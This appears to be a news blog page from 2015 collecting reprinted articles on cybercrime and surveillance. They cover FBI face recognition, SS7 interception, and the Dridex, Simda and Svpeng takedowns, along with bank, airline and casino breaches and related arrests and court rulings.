Thursday, 22 October 2015

FBI cyber experts deny Bourne-style biometric snooping exists, but it may one day

FBI cyber experts deny Bourne-style biometric snooping
Cyber spooks in films and TV shows like Bourne and 24 often have access to a sprawling, real-time surveillance system capable of watching and scanning the faces of the public anywhere in the world.
Yet technology experts with experience of the FBI have recently claimed this is far removed from the realities of how such as biometric systems can be used.
Jim Loudermilk, a senior level technologist at the FBI's science and technology branch, said the agency does not have access to real-time face-recognition biometrics on such a grand scale.
"Here in London you are all familiar with the vast numbers of cameras. But most of you probably don't realise that what you see in the science fiction movies is not true," he told a recent biometrics conference in London.
"My own assessment is that the use of pattern-matching technology for faces is about at the maturity level that pattern matching of fingerprints was in the late 1980s.
"We do not have highly reliable automated systems that can instantaneously ingest video and track people from camera to camera unaided by a human being."
Loudermilk explained that face recognition and biometric analysis is not yet able to provide the FBI with conclusive positive IDs, and that the lack of functionality comes down to budgets.
"If we were prepared to spend a few hundred million dollars and add several hundred people as skilled examiners we probably could do positive identification from faces in a decade, but I think it's unlikely we will choose to make that sort of investment."
Even if it did, the actually database of files with which to cross reference this sort of information is quite low in the era of big data: "We don't have very many mug shots on file. Only about 20 million at the moment," he added.
Another face in the crowd
The claim that face-recognition tools are not yet at the level of the movies is echoed by Leo Taddeo, a former FBI special agent in charge of the New York cyber division and now the CSO for Cryptzone, but he believes it will be possible one day.
"Today, it may not be possible to spot a known terrorist in a photo of a crowd at a sporting event, but someday that capability will exist," he told V3.
Taddeo also noted that the use of face recognition has evolved to the point where it can be used in "many investigative scenarios".
"Agents are now able to check the photo of a bank thief taken from a surveillance camera against a set of known convicts to find a potential suspect. The confirmation of identity is still done using multiple factors, but narrowing down the search is greatly aided by the new face-recognition technologies," he explained.
However there are obviously civil liberty and privacy concerns raised with the use of such technologies, and their future potential capabilities.
Dr Richard Tynan, technologist at Privacy International, warned of a need for clear definitions in biometric capabilities.
"I think you might have to ask what they mean by real time. Is it that they are unable to get the name and address information of every individual in a given scene of a CCTV camera?" he said.
"Even if that's what they are trying to do, it's incredibly worrying that they are trying to do real-time identification of individuals and not just when a crime happens, which is one of the stated purposes of CCTV."
Furthermore, Dr Tynan noted that the FBI staffers claims seems to be at odds with private firms already rolling out sophisticated face-recognition systems.
"Microsoft has recently rolled out face recognition on some of its latest laptops which will allow you to unlock the computer," he said.
"There are other types of face recognition such as Facebook deploying auto tagging in pictures, claiming to have sophisticated technology that can distinguish between identical twins.
"So the [1980s] comment seems weird to me given that we have seen so many claims made about this technology from the private sector."
Privacy International also provided V3 with documentation showing a range of ‘vision analytics' tools that offer sophisticated biometrics and location monitoring in real time (PDF).
Yet while FBI experts play down the scope of real-time surveillance systems, they openly admit that the use of biometrics in law enforcement is not a new phenomenon.
The FBI currently uses a vast amount of technology to take advantage of the unique indicators that accompany biometric information, such as fingerprints, iris patterns and palm and finger patterns.
"The use of fingerprints has been a fundamental investigative tool in the FBI's kit for almost its entire 100-year history," explained Taddeo.
"For most of the last century, the science of collecting, cataloguing and comparing fingerprints did not change very much. Advances in information technology have allowed us to make quantum leaps in fingerprint and other identification technologies.
"We can collect fingerprints as electronic images. As such, we can transmit and search for matches at record speed. This means police officers don't have to wait for a manual search. It also means we can search wider databases."
Loudermilk gave some insight into the scope of these databases, during his presentation in London last week.
"We have 69 million people currently on file and we have another 37 million on file in the civil repository and I expect that to grow significantly. Right now we have 106 million people, all separate identities," he said.
"We have a fairly substantial repository of people who have been arrested for criminal offences."
However, it is DNA matching that remains the 'gold standard' in biometrics and forensics.
Loudermilk said that the FBI holds 14 million known DNA subject profiles in a national database consisting of the Combined DNA Index System and the National DNA Index System.
Double-edged sword
Unquestionable law enforcement will continue to use biometric analysis to aid their operations, but it can be a double-edged sword, as Taddeo explained.
"For example, after the recent OPM breach, where millions of government employee fingerprints were reportedly stolen by the Chinese government, it will be much harder for a US agent to enter China without the Chinese knowing who they are and who they work for," he said.
"The same is true for fingerprints and facial recognition. Undercover agents will have a harder time getting past border controls in an undercover capacity."
Perhaps this is something Hollywood scriptwriters will have to consider for their future spy thrillers too.

Security researchers face wrath of spy agencies

Researchers tasked with revealing attacks by intelligence agencies are being harassed, locked out of tenders, and in some cases deported, Kaspersky researcher Juan Andrés Guerrero-Saade says.
Retaliation by the unnamed agencies is in direct response to news of prominent advanced-persistent threat campaigns that have coloured information security reporting over recent years.
Those reports are forcing researchers to reveal malware attacks by government spy agencies.
Specific details on the harassment is tightly-held, although some may occur in Eastern Europe and Asian nations.
Guerrero-Saade told Vulture South researchers have spoken about their ordeals in private information security circles. Other stories circulate as industry rumour.
"In many places intelligence services tend to be more civilised than in others -- you would be lucky to deal with them in the US versus wherever else, Latin America, Asia, or Eastern Europe where they take very different tactics, " Guerrero-Saade says.
"You can definitely see these threats to livelihood[s] where it can be as simple as patriotic notions … all the way to 'you have already made it clear where you stand and it's going to be next to impossible for you to get a security clearance' and to work in a large sector of countries where a large amount of anti-malware work is being done.
"I think it is easier to imagine situations where blackmail, compromise, and threat of livelihood is an issue, and it has been an issue for certain researchers for obvious reasons aren't going to speak up."
Other researchers speaking to this reporter have heard similar stories. Others haven't but aren't surprised their colleagues find security clearances revoked. China is cited as a nation some opt to avoid.
Guerrero-Saade spoke on the back of his paper The ethics and perils of APT research: An unexpected transition into intelligence brokerage [pdf] which he says is a "meditation" that covers the perils faced by threat intelligence companies and researchers as the ultimately altruistic academics aggravate diplomatic and national interests.
The paper notes researchers are targeted through blackmail which is regarded as a cheap way for agencies to "own" an individual by digging up their secrets, debt, and "shameful proclivities and mis-steps".
"This type of compromise is in some cases related to the threat to livelihood as private information security companies have displayed a more or less strict moralism in their hiring practices, often preferring practitioners untainted by publicly known blackhat tendencies," Guerrero-Saade writes.
Security researchers who live in the country of the aggrieved intelligence agency face the harshest treatment. Here agencies target threats to living conditions including the revocation of non-citizens' resident status, "in some cases separating families or forcing a return to dreadful conditions".
Natives are described as unpatriotic, and are barred from government work and holding security clearances.
“In certain countries, citizenship is only a protection from overt and legal repercussions but processes without oversight are the main playing field of security services. Vague threats carry weight in this space.”
That is leading to an industry Balkanisation which is "well underway at this time".
Intelligence firms too are being harassed. Guerrero-Saade says unnamed agencies serve threats to "operational viability, revenues, ongoing and potential contracts, strategic partnerships, PR value, as well as regulation-based financial repercussions".
Such harassment merits "any effective measures available" when threat research stands in direct opposition to national diplomatic, financial, or political viability.
Such work may cause heightened diplomatic tensions to flare, or jeopardise the reputation of an intelligence agency or those to which it serves. Here's a fragment of his talk:
"Companies with government contracts will see these contracts dangled and unrelated vital strategic partnerships may suddenly become unstable or entirely unavailable. When international companies are involved, unsubstantiated but well-placed insinuations may suffice in closing off entire crucial market sectors and, if not, threats of loosely applied embargoes can destroy the most meticulously built business. "
He further details the perils of the burgeoning threat intelligence industry in the absence of kinds of rules of engagement whereby many researchers - rightly-so - treat all malware as abusive regardless of source, and the motivations and actors behind attacks are often glossed over.
The nine-page report notes the publication of intelligence materials by private sector firms as 'regular grievances' that are "unthinkable to their intelligence agency counterparts". Another extract:
"Provocation occurs in two scenarios: first, where the (threat intelligence) company’s research causes political, diplomatic, or military tensions to flare between nations in an already escalated posture. Secondly, when the company’s public disclosure -- or private offering provided directly to sensitive targets -- endangers the reputation of the intelligence agency itself or worse yet comes close to revealing or endangering the requesting customer. The former scenario is undesirable; the latter scenario is unacceptable."
Not all research weighs the same. Guerrero-Saade says a recent report examining Chinese threat actors overstepped the boundaries of usefulness when it revealed the personal information of attackers including their daily activities, photos, and family members.
The future is unclear, the researcher says. Intelligence agencies may be pushed to develop highly-capable malware designed to slip past researchers, while even most-capable researchers dabbling in the unmasking of intelligence agencies will need to undergo "drastic preparations" to not only excel but survive.

Friday, 16 October 2015

A bug in Facebook accidentally shows how popular your posts are

Facebook is diligently attempting to remove a software bug that lets users of their mobile website see view counts for their own and others’ posts within the Facebook social network.

Facebook currently displays the number of views under videos posted on the Facebook site, but this software bug goes beyond that and lets one see the number of views on any article or video link, this also includes those from news media and other official organizational pages. The bottom line of this revelation, is the realization that nothing you say or share will ever be as popular among your friend group as a arbitrary article or a video on how to make ramen fries.

Currently, the software bug, only affects Facebook’s mobile site, and not Facebook for conventional desktop PCs or the company’s official mobile apps. It has been confirmed by Facebook that the software bug is removing the view counts from user posts.

Facebook claims to have no future plans to let individual users see view counts. Part of consequence of using the Facebook social network is the understanding that you’re feeding content into a black box, controlled by a mysterious and proprietary software algorithms the user has no control over and is not allowed to understand.

In 2013, A Stanford University study conducted by assistant professor Michael S. Bernstein and Facebook’s data science team has revealed that the average Facebook user only reaches about 35 percent of their friends with a single post and over the course of a month, the average user will reach barely two out of every three friends.

This problem effects other media organizations and other page owners that have been with Facebook for years. Users that have invested heavily with their followers in obtaining and growing their number of likes on their page are often shocked to only have the social network charge them for reaching more than a small fraction of their audience.

But Facebook holds the control and the keys to their News Feed. For now that’s how it goes. Until, of course a bug comes along, and we see just how popular — or not — you really are in your Facebook network.

Malaysia arrests hacker for stealing U.S. security data

NBC News has learned federal prosecutors have charged a Kosovo man they believe is responsible for assembling an ISIS 'kill list" of more than 1,000 military personnel and U.S. government employees. USA TODAY

A Kosovar man living in Malaysia who accessed the personal data of more than 1,300 government and military employees, and passed that data onto the Islamic State, has been arrested in Malaysia on U.S. charges, the Department of Justice announced Thursday.
Ardit Ferizi also accessed customer data from an unidentified Internet retailer, obtaining credit card information on 100,000 customers, according to a federal indictment unsealed in Virginia. Ferizi, allegedly head of a group of Albanian hackers from Kosovo, even went so far as to admonish employees of the retailer via email when they detected his penetration of their system and blocked him.
According to a lengthy affidavit filed by FBI special agent Kevin Gallagher, who is based out of the Washington field office, Ferizi had unauthorized access to a federal computer and used that access to obtain email addresses, cities of residence, dates of birth and other personal identifying information on 1,351 government and military workers, and passed those names onto the Islamic State terrorist group between April and August.
He transferred the information via links he posted to Twitter, the affidavit said, "for the purpose of encouraging terrorist attacks against against the individuals." He also used the social media site to communicate to two known Islamic State members, Tariq Hamayun — also known as Abu Muslim al-Britani — and Junaid Hussain — also known as Abu Hussain al-Britani. Hussain died in August in an air strike in Raqqah, Syria.
The activity prompted the Islamic State Hacking Division to tweet a message to "crusaders" engaged in a "bombing campaign" against Muslims: "We are in your emails and computer systems, watching and recording your every move, we have your names and addresses … we are extracting confidential data and passing on your personal information to the soldiers of the khilafah, who soon with the permission of Allah will strike your necks in your own lands!”
Regarding the retailer, not named in the document, Ferizi accessed a server in Phoenix in June that belongs to an Internet hosting company that maintain's the company's website, according to the affidavit. On Aug. 13, the retailer contacted the FBI to report unauthorized access to its site, Gallagher wrote.
As of spring 2015, Ferizi has been living in Malaysia on a student visa and studying at Limkokwing University of Creative Technology in Cyberjaya, Malaysia.

Hackers steal £20 million from UK bank accounts using malware

Law enforcement agencies with the help of several cybersecurity firms took control of a botnet network of machines that distributed malicious software known as “Bugat,” “Cridex” or “Dridex. The Dridex malware was used by cyber criminals to steal some £20 million ($30 million) from UK bank accounts according to the National Crime Agency (NCA).
NCA has issued issued a warning Internet users especially those from United Kingdom to protect themselves against the Dridex and said that they are chasing down the “technically skilled” cyber criminals.According to NCA this malware preyed on unsuspecting people by slipping into their computers, stealing passwords and siphoning money from bank accounts. For distribution, it relied on a network of enslaved computers. Experts say the botnet infected maybe 125,000 computers a year.Separately, the U.S. Department of Justice also filed criminal charges against Andrey Ghinkul, a 30-year-old man who is believed to have been the hacker at the helm of the operation. Ghinkul was recently arrested in Cyprus, and American prosecutors are seeking to have him extradited to stand trial in the United States.U.S. Attorney David J. Hickton of Pennsylvania said: “We have struck a blow to one of the most pernicious malware threats in the world.”According to the indictment, Ghinkul’s high tech cyber crimes have been going on for years now. Investigators believe Ghinkul and others sent official-looking spam that tricked people to open poisonous email attachments. Using that method, they were able to steal $3.5 million from Penneco Oil in Pennsylvania in 2012 and send that to bank accounts in Belarus and Ukraine, according to the indictment.Bugat evolved over the years into smarter and more capable versions. Researchers called later it Cridex, then eventually Dridex. The massive botnet distribution system — the one that was just shut down — made Dridex the most popular malware bombarding corporate computer networks. If work email got hit with spam, it’s likely much of it was Dridex.

Security researchers have been collaborating with the law enforcement agencies for this operation.  Researchers from Proofpoint said that the hackers sent out waves of up to 350,000 Dridex-laced spam emails every day, while, researchers at Dell SecureWorks started working on a project to disrupt the monstrous botnet. It teamed up with law enforcement, and received legal permission to hack the botnet, according to the company.

In United Kingdom, Mike Hulett from the NCA said: “This is a particularly virulent form of malware and we have been working with our international law enforcement partners, as well as key partners from industry, to mitigate the damage it causes.

Think your mobile calls and texts are private? It ain't necessarily so

 Silhouette of spy discerning password from code uses a command on graphic user interface

Mobile networks around the world have been penetrated by criminals and governments via bugs in signalling code.
Security holes have been found in a technology known as Signalling System 7 (SS7), which helps to interconnect international mobile networks across the globe.
AdaptiveMobile has uncovered evidence of global SS7 network attacks causing damage to mobile operators around the world after partnering with mobile operators and networks to analyse and secure the SS7 traffic across their networks.
Exploits, including location tracking and call interception, are said to be rife. The study also uncovered evidence of attempted fraud, focusing on Europe, Middle East and the Americas.
The results are a serious concern but not entirely surprising. Flaws in SS7 have been known about for years and readily lend themselves to surveillance, both targeted and on a grand scale, allowing miscreants to tap into calls, read text messages and divert traffic.
In one well documented case, SS7 flaws were used to redirect sensitive conversations of targeted individuals on the MTS Ukraine network to a Russian mobile operator.
By contrast, SS7 is far more robust when it comes to the security and integrity of billing functionality. Even so, some studies have suggested SS7 loopholes can be abused to move credit between mobile accounts.
Attacks such as ”silent SMS pings" can be used to locate mobile phones anywhere in the world via SS7. With the right request it might be possible to trick a mobile network into handing over the crypto keys from any SIM/session. This rumoured – but unverified – capability would be restricted to the more capable intel agencies.
Details of SS7 vulnerabilities were publically revealed for the first time at the Chaos Communication Congress hacker conference in Hamburg last December. El Reg's story on the CCC presentation provides more info on how the ageing SS7 protocol works as well potential attacks.
AdaptiveMobile’s SS7 Protection service, launched in February 2015, aims to analyse and secure the SS7 traffic travelling through operator networks. The firm uses the combination of an SS7 Firewall, advanced reporting and threat intelligence to identify and combat threats. Sitting on the systems of 75 operator networks worldwide, AdaptiveMobile protects one fifth of the world’s subscribers, witnessing in excess of 30 billion mobile events every day, according to the mobile network security firm.
Unauthorised access to the SS7 network can cause significant financial and reputational damage to the operator community, according to AdaptiveMobile. Fraudulent roaming configurations can cost operators millions of dollars without any opportunity to recapture this revenue. Without appropriate preventative measures being put into place, operators are allowing adversaries to know exactly where a subscriber is at any given moment and to intercept and reroute device communications, listening to every call and reading every text message, the firm warns.
“Through our analysis of SS7 traffic we’ve detected numerous types of SS7 requests and responses being received and sent from one operator network to another,” said Cathal McDaid, head of AdaptiveMobile’s Threat Intelligence Unit. “From the Americas to MENA, Europe to APAC, the operator networks analysed have all shown evidence of suspicious SS7 activity. We’re working with operators to secure their networks as none are exempt from these types of attacks.”
Chris Wysopal, CISO and CTO at application security firm Veracode, commented: “The SS7 vulnerabilities are just another example of software-based systems that weren’t built for the rich interconnectivity and threats of the modern mobile infrastructure.”
“Development teams need to go into projects with the expectations that what they’re creating will live in a hostile environment where attackers will look to exploit vulnerabilities. We’ve seen this across every industry and it’s no surprise it’s occurring in the telco industry,” he added.
The potential for abuse for any group capable of breaking SS7 are rich, according to Wysopal.
“A core protocol like SS7 provides governments and rogue actors wide access to the world’s communications infrastructure making it an incredibly attractive system to break into,” Wysopal explained. “Until software developers change their approach and build security into their code from the start, we’re going to continue to see these problems.”
A worldwide map of SS7 international roaming infrastructure vulnerabilities – put together following an earlier study by telecom security specialist P1 Labs late last year – can be found here. China is among the countries with the worst security rating for SS7 security, alongside the likes of Uzbekistan. Somalia and Yemen as well as (more surprisingly) Bolivia and Greenland are also highlighted.

Students, graduates, amateurs: Win £10,000 in Cyber 10K challenge

 NCC Group is running the Cyber 10K security challenge to encourage young people and security amateurs to join the industry – and The Register is the exclusive media partner.
You can scroll down for details of how to enter the competition.
As a background, the UK, as many of us know, has an ongoing shortage of skills in science, technology, engineering and mathematics (STEM), despite the best efforts of government-inspired education initiatives.
Vocational training and apprenticeships are a good foundation for acquiring practical skills and also deliver a demonstrable career path. Competition-based funds are one way industry can encourage young people to consider and embark upon careers in STEM, NCC Group’s Cyber 10K being a good example.
Ollie Whitehouse, technical director at NCC Group, explains: “We are continuously being reminded of the importance of STEM subjects and the ground-breaking innovations that can be created in these areas. Similarly to its STEM counterparts, the topic of computer science, and more specifically cyber security, is one that is difficult to fully grasp in a classroom or lecture theatre.
“Often, learning through experience is much more valuable. And if we are to develop the next generation of talent in the cyber security industry, it’s important that we offer IT amateurs the opportunity to gain real practical experience in order to better their skills.
“That’s where competitions like the Cyber 10K come in. These types of competition based funds create a win-win situation for both ambitious amateurs and the sector – they help to nurture and encourage talent, resulting in a pipeline of knowledgeable, experienced and creative security professionals for the industry.”
Competition details are below. Get cracking!


Timing Duration: September – November 2015

Entry criteria

  • Description of the problem you are trying to solve.
  • Description of your solution and how it addresses the problem.
  • In addition to the above for an entry to qualify you must include a working prototype – a functional solution which can be used to demonstrate the idea in a reliable manner that accurately shows the idea working.
It is recommended that you also include Design documentation for the solution<


There are no strict categories. Anything goes as long as it hits the entry criteria, but some areas that you might want to think about include:
  • cloud security
  • cyber incident response and clean-up
  • IoT and mobile security
  • consumer and user awareness, training and support
  • cyber security on small budgets

The judging panel includes the following experts:

  • John Leyden, security reporter, The Register
  • Professor Steve Schneider, director, Surrey Centre for Cyber Security
  • Professor Tim Watson, director at University of Warwick’s cyber security centre
  • Alex van Someran, managing partner at Amadeus Capital Partners
  • Paul Vlissidis, director of .trust at NCC Group

Monday, 4 May 2015

Cybergang that was behind the $15 million bank robbery has been arrested by the Romanian authorities

The Romanian Directorate for Investigating Organized Crime and Terrorism (DIICOT) has shed light on a new cyber heist by raiding 42 locations in six countries on Sunday. They have detained 25 people whom they suspect to be part of a 52 member international cyber gang which could include the individuals not only from Romania but also from various other parts of the globe.
The Romanian authorities suspect that these hackers could have hacked the banks to clone the payment cards which were then used in various ATMs across the world to steal more than $15 million.
As per DIICOT, the required data to clone the cards was obtained by hacking the computer systems  from banks in the US (Puerto Rico) and in Muscat, the capital city of Oman. Further it seems the criminals targeted the accounts which belonged to large corporations and successfully extracted the payment card data of these accounts which they then used to create fraudulent cards. These cloned fraud copies of cards were later distributed to the members of the cyber gang. The members in turn used the cloned cards to withdraw money from ATMs across different International countries.
As per the Romanian authorities, it seems the cyber gang were well coordinated and they properly chalked out the withdrawals in batches over a shorter intervals and also it was planned out on ‘non business’ days of the financial institutions (banks).
For example: On February 20th 2013, $9 million/ €8.3 million was withdrawn from the ATMs across Japan by these criminals. Similarly, on December 2nd 2013, the gang hit almost 4,200 transactions that totaled to $ 5 million / €4.6 million in cash from ATMs across 15 Romanian cities. This clearly indicates that within a year the gang made almost 34,000 ATM transactions in 24 countries.
The DIICOT further added that the gang also were able to carry out their fraudulent withdrawals in US, UK, Germany, Italy, Spain, Netherlands, Canada, Colombia, Dominican Republic, Mexico, Indonesia, Egypt, Malaysia, Russia, Sri Lanka, Thailand, Ukraine, the United Arab Emirates, Pakistan, and Latvia.
On Sunday, the Romanian authorities carried out the execution in six cities that included 42 house searches. Police have seized 16 laptops, smartphones which were used for the heinous activity by the gang members. Further, the authorities also seized 2 kg / 4.4 lbs of gold bars, €150,000 / $163,000 in cash and paintings. It seems the money acquired from the heist was also invested into real estate and other valuable goods by the group leaders, for now these all have been placed under restrictions till further investigations, as told by DIICOT.
Also this is not a first cyber heist, a similar scenario was seen when a gang known as Carbanak was successful in stealing $ 1 billion from various banks and other financial institutions across 25 countries. The researchers at Kaspersky Lab, in February, reported the actual technique that was used by the criminals. As per the report, the criminals used spear phishing method wherein they targeted the victim’s network by sending emails with malicious attachments. With this malware the criminals infected the computers systems of the bank and financial institutions and carefully learnt the internal procedures with which they were able to jump the network until they reached their point of interest which is to extract the money using the infected entity. Since every bank would follow different methods, the infected computer were used to record videos and these shots were sent to the servers of the attackers to learn the commands that is used for withdrawal of money, thus the criminals were successful in their heists.    
One more recent incident is the case of Ryanair, which is still under investigation stages wherein $ 5 millions was stolen from the bank accounts that was used for fuelling the aircrafts.
As per the report from security researchers the general trend seen among organized cybercrooks is to target the banks and large financial institutions instead of the customers to hit bigger heists.

Fulton school district recovers from hacking

 FULTON - The Fulton School District is still recovering from a denial of service hack carried out by one of their students.
The Fulton Police Department announced Friday they arrested Austin Taylor Singleton, 17, who used a thumbdrive with malware to shut the system down.
Fulton Police received a call from Fulton High School advising someone hacked the district's computer network.
Through an investigation, the district's IT department traced the hacking back to a computer in one of the classrooms, where a student was confirmed being logged in on that computer at the time.
Fulton Superintendent Jacque Cowherd said they will prosecute Singleton in order to deter further attempts.
Singleton was arrested and charged with tampering with computer equipment, a class A misdemeanor.
Police said there was no release of any confidential information as a result of the hack.

Ryanair hack sees €4.6m stolen and sent to Chinese bank account

Ryanair has been the victim of cyber theft
European airline Ryanair has admitted falling victim to a hacking attack that saw €4.6m of the company's money transferred to a bank account in China.
Law enforcement agencies and financial organisations have already been alerted to the incident, according to reports, and Ryanair is confident that it will get the money back.
"Ryanair confirms that it has investigated a fraudulent electronic transfer via a Chinese bank last week. The airline has been working with its banks and the relevant authorities and understands that the funds, less than $5m, have now been frozen," the company said.
"The airline expects these funds to be repaid shortly, and has taken steps to ensure that this type of transfer cannot recur. As this matter is subject to legal proceedings, no further comment will be made."
The relevant authority in Ryanair's home country of Ireland is the Criminal Assets Bureau, an independent body with powers similar to the local police.
Like the UK Assets Recovery Agency, the Criminal Assets Bureau focuses on serious crimes and the ability to pursue assets from criminals and compensate victims.
The airline industry benefits and suffers from its use of technology. American Airlines was forced to ground flights this week because of a software problem. British Airways fell victim to an apparent hack in March that affected its most frequent fliers.
The company cleared out some of its user accounts and changed log-ins, but it was revealed that the hack was more of a probe on its systems enabled by a leak from another provider.
"This appears to have been the result of a third party using information obtained elsewhere on the internet, via an automated process, to try to gain access to some accounts,” BA said in a statement at the time.
The incidents underline the perils technology can pose to businesses and the importance of having adequete plans in place should things go wrong.

Hard Rock Casino Credit Card Breach Undetected for 7 Months

Hard Rock Casino Credit Card Breach Undetected for 7 Months
The Hard Rock Casino in Las Vegas has been hit with malware leading to the compromise of credit card data, names and addresses at restaurant, bar and retail locations. The compromise did not affect the hotel or casino transactions. No details regarding the specific malware or other specifics regarding the compromise were provided. The glaring point of this particular breach was that it went undetected for 7 months.
The fact that the compromise was not detected by the hotel itself is not surprising as many retailers have not been able to detect the presence of point-of-sale malware, or exfiltration of card data. Most of the time the retailers discover the breach when the Secret Service or fraud analysts at banks notify them that they have detected credit card fraud patterns, or stolen cards in underground markets that puts their point-of-sale systems as the origin of the breach.
In their statement the Hard Rock Casino did not state how they detected the breach, so it is not clear if they were notified by an agency or bank, or if they identified it on their own.

Tuesday, 14 April 2015

Hackers breach frequent-flyer Lufthansa accounts

The German airlines blocks several accounts after the attack.
Hackers have breached into the customer accounts of Lufthansa to use their miles for purchases, reminiscent of similar incidents involving other top airlines in the past few months.
The German airliner said that it has blocked several accounts after those of some frequent flyers have been hacked.
According to German media reports, the attackers have used a bot net that helped them generate usernames and passwords on numerous computers. The right combinations of credentials were used to access frequent-flyer miles. has quoted a Lufthansa spokesperson as telling DPA news agency that it 'had not been able to prevent illicit access to some customer files'.
"We had to lock several hundred customer pages. We believe to have the problem generally under control," he said.
The miles have been credited back to the accounts of the attacked customers, the airlines added.
Attack on Lufthansa comes two weeks after thousands of British Airways frequent-flyer accounts were hacked in March.
American and United airlines reported similar incidents in December. American Airlines said that about 10,000 accounts were hacked while United Airlines confirmed that hackers booked trips or made mileage transactions on about three dozen accounts.

Hackers Attack Belgian Press Group, Second in Days

Hackers attacked one of Belgium’s top newspaper publishers on Sunday just days after Tunisian Islamist militants took control of a regional government portal to denounce US counter-terror operations.
There was no immediate indication the incidents were linked to each other or to a massive cyberattack against French station TV5Monde on Wednesday which Paris said was likely a “terrorist act.”
Didier Hamann, head of the Le Soir newspaper, said the daily had been “the victim of an attack.”
“Nothing concrete to link it with TV5 or RW,” Hamman said in a tweeted message, referring to the French attack and Friday’s takeover of an economic news website run by the Wallonian regional government in southern Belgium.
“We are trying to determine the origin of the attack,” Hamann told Belga news agency separately.
“We are regularly targeted and the attacks are quickly controlled but in this case, the firewalls did not work as normal,” he added.
Le Soir is owned by the Rossel Group which has several other publications.
Its websites were unavailable from 1730 GMT Sunday.
Eric Malrain, chief financial officer with the Rossel Group, told AFP: “There has been a cyberattack at Le Soir but we have no other information for the moment.”
Hamann said Le Soir would appear Monday as usual.
Earlier reports treated the incident as a technical breakdown before it was established it was a hacking attack.
In Friday’s attack on the Wallonian government website, hackers identified as the “Fallaga Team” from Tunisia ran a video followed by a message saying:
“Take your heads out of the sand, struggle against your leaders, join the resistance.”
Press reports said the Fallaga Team had hacked several French institutions shortly after the Islamist attacks in Paris in January which left 17 people dead.
The TV5Monde hackers for their part said French President Francois Hollande had committed “an unforgivable mistake” by joining the US-led air campaign against the extremist Islamic State group in Syria and Iraq, which had led to the January killings in Paris.
Belgium is also part of the US-led operation and in February said it would send around 35 soldiers to Iraq to help train its army in the fight against IS.

Interpol frees 770,000 systems from Simda botnet

Interpol targets the Simda botnet
Interpol has successfully freed 770,000 machines from the Simda botnet during a joint operation with Microsoft, Kaspersky Lab, Trend Micro and Japan's Cyber Defense Institute.
The operation saw Interpol's Digital Crime Centre (IDCC) coordinate with local law enforcement and the tech firms to mount a series of "simultaneous" server takedowns in the US, Russia, Luxembourg and Poland on 9 and 10 April.
The operation has been hailed as a major success in the ongoing battle against cyber crime.
Simda has been used to target everything from general web users to financial institutions for several years.
The attacks granted hackers remote access to victim systems and let them spread malware and steal vast amounts of data, including personal identifiable information and banking passwords.
Kaspersky Lab security expert Vitaly Kamluk said the campaign was particularly dangerous as it had defence-dodging capabilities.
"This bot is mysterious because it rarely appears on our KSN radars despite compromising a large number of hosts every day," he explained in a blog post.
"It has a number of methods to detect research sandbox environments with a view to tricking researchers by consuming all CPU resources or notifying the botnet owner about the external IP address of the research network.
"Another reason is a server-side polymorphism and the limited lifetime of the bots."
The operation began after Microsoft's Digital Crimes Unit spotted and reported a spike in Simda infections.
In January and February Interpol reported that Simda had enslaved 90,000 systems in the US alone.
The IDCC then worked with Microsoft, Kaspersky Lab, Trend Micro and Japan's Cyber Defense Institute to create a "heat map" detailing infection hot zones and the location of the botnet's command and control servers.
Microsoft has since released a Simda clean-up tool that will let users purge their systems of the malware.
IDCC director Sanjay Virmani said the combined operation demonstrated the value of collaboration between the public and private sectors in combating cyber crime.
"This successful operation shows the value and need for partnerships between national and international law enforcement with private industry in the fight against the global threat of cyber crime," said Virmani.
Trend Micro argued that businesses must devise more robust cyber security strategies if they hope to protect themselves from threats like Simda.
"We advise users to be cautious when opening emails. Avoid opening emails and attachments from senders who are unknown or who cannot be verified," explained Trend Micro in a blog post.
"P2P networks aren't inherently malicious but users should be aware that dealing with these sites can increase their chances of encountering malware.
"Users should also invest in a security solution that goes beyond simple malware detection; features such as spam detection and URL blocking can go a long way in protecting users from threats."
The Simda takedown is the latest in a series of anti-botnet operations.
A task force comprising Europol, the Dutch National High Tech Crime Unit and the FBI, with support from Intel, Kaspersky and Shadowserver, reported taking down the Beebone botnet on 9 April.

Russia pulls alleged 'Svpeng' kingpin

money trap conceptual illustration
Russia's Ministry of the Interior has gone public about the March 24 arrest of a 25-year-old and four others it believes was the leader of a gang of cyber-scum behind the “Svpeng” money-draining malware.
The Android malware is believed to have netted a near million-dollar haul within Russia alone (50 million rubles), hitting 350,000 Google devices during 2013 and 2014.
According to Forbes, Svpeng started by acting like a Google Play buy-credit window, opening over the top of the store requesting credit card details. Later, the group in charge switched tactics to ransomeware, popping up a fake FBI “penalty notification” on screens and locking devices until the gang was paid.
Last year, Kaspersky noted the group's decision to start attacking users outside Russia's borders.
According to Google Translate, the ministry's April 11 announcement says the arrests took place in Chelyabinsk during March.
The operatives “seized a significant amount of computer equipment with traces of Internet dissemination of malicious software, mobile phones, SIM cards, electronic media, server hardware,” the statement notes, along with the credit cards that received the stolen funds.
The translation suggests a confession was obtained.

Wednesday, 8 April 2015

Illegal downloading: Australia internet firms must supply data

Actors Matthew McConaughey and Jared Leto attend the "Dallas Buyers Club" UK premiere at the Curzon Mayfair on 29 January 2014 in London, England
An Australian court has ordered internet service providers (ISPs) to hand over details of customers accused of illegally downloading a US movie.

In a landmark move, the Federal Court told six firms to divulge names and addresses of those who downloaded The Dallas Buyers Club.

The case was lodged by the US company that owns the rights to the 2013 movie.

The court said the data could only be used to secure "compensation for the infringements" of copyright.

In the case, which was heard in February, the applicants said they had identified 4,726 unique IP addresses from which their film was shared online using BitTorrent, a peer-to-peer file sharing network. They said this had been done without their permission.

Once they received the names of account holders, the company would then have to prove copyright infringement had taken place.

The judgment comes amidst a crackdown by the Australian government on internet piracy.

Australians are among the world's most regular illegal downloaders of digital content. The delay in release dates for new films and TV shows, and higher prices in Australia for digital content, have prompted many Australians to find surreptitious ways to watch new shows.
Australians are some of the world's most enthusiastic illegal downloaders

The ISPs involved in the case, including Australia's second-largest provider iiNet, said releasing customer information would be a breach of privacy and lead to what is known in the US as "speculative invoicing".

This is where account holders are threatened with court cases that could result in large damages unless smaller settlement fees are paid.

The ISPs argued also that the monetary claims which the US company, Dallas Buyers Club LLC, had against each infringer were so small "that it was plain that no such case could or would be maintained by the applicants".

But Justice Nye Perram ruled that the customer information could be released on condition it was only used to recover compensation for copyright infringement.

"I will also impose a condition on the applicants that they are to submit to me a draft of any letter they propose to send to account holders associated with the IP addresses which have been identified," he ruled.

Justice Perram said the ruling was also important for deterring illegal downloading.

"It is not beyond the realm of possibilities that damages of a sufficient size might be awarded under this provision in an appropriately serious case in a bid to deter people from the file-sharing of films," he said.

